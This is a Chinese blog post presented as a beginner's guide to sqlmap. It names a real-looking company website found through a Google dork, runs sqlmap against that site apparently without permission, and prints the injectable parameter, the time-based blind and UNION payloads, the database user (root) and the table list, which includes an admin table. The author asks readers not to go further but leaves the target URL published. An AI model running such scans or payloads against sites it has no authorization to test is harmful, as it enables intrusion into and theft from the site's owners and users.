sqlmap新手注入

一 什么是sqlmap 　　

 sqlmap is an open source penetration testing tool that automates the
 process of detecting and exploiting SQL injection flaws and taking over of
 database servers. It comes with a powerful detection engine, many niche
 features for the ultimate penetration tester and a broad range of switches
 lasting from database fingerprinting, over data fetching from the
 database,
 to accessing the underlying file system and executing commands on the
 operating system via out-of-band connections.

sqlmap 是一个开源的自动探测和发现sql注入漏洞以及拿下数据库服务器的工具.它有一个强大的探测引擎,许多有些的特性支持探测服务器以及拿下数据库服务器.

** 简言之 sqlmap 是个拿站工具.

二 安装.

　　python 2.6 或2.7 ,mark 只是这两个主版本.sqlmap 安装可以用easy_install 或者用git clone 从仓库拿.

三 寻站

　　google hack 啊, inurl:\".php\?id=

　　就试下第二个吧.www.cowinbio.com/about/index.php?id=1 

　　开干

  blind (heavy query)' injectable
 [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech
 ique tests as there is at least one other (potential) technique found
 [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
 [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col
 mn 1. sqlmap will try to find another column with better characteristics
 [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c
 lumns' injectable
 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an
 )? [y/N] n
 sqlmap identified the following injection point(s) with a total of 2626 HTTP(s)
 requests:
 ---
 Parameter: id (GET)
     Type: AND/OR time-based blind

然后

          _
  ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
 |_ -| . | |     | .'| . |
 |___|_  |_|_|_|_|__,|  _|
       |_|           |_|   http://sqlmap.org

 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
  consent is illegal. It is the end user's responsibility to obey all applicabl
 local, state and federal laws. Developers assume no liability and are not resp
 sible for any misuse or damage caused by this program

 [*] starting at 10:15:04

 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t
  target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really
 ant to force the back-end DBMS value? [y/N] y
 [10:15:22] [INFO] testing connection to the target URL
 [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi
  could interfere with the results of the tests
 [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/
 S
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: id (GET)
     Type: AND/OR time-based blind
     Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
     Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

     Type: UNION query
     Title: Generic UNION query (NULL) - 2 columns
     Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
 -- -
 ---
 [10:15:23] [INFO] testing MySQL
 [10:15:23] [INFO] confirming MySQL
 [10:15:23] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 5.6.9
 back-end DBMS: MySQL < 5.0.0
 [10:15:23] [INFO] fetching current user
 current user:    'root@localhost'

再之后

         _
 ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program

[*] starting at 10:16:44

[10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic
 could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL
-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database:    'cw'

 Database: cw
 [3 tables]
 +---------+
 | admin   |
 | news    |
 | product |
 +---------+

就到这里吧. 毕竟是写博客.本人并没有再进一步深入,希望各位看官也不要再进一步尝试了.

另外友情提醒这个站 ,你们不太安全.

郑重声明以上文章本人原创,转载请标明出处. 小三爷 此处谢过了~~.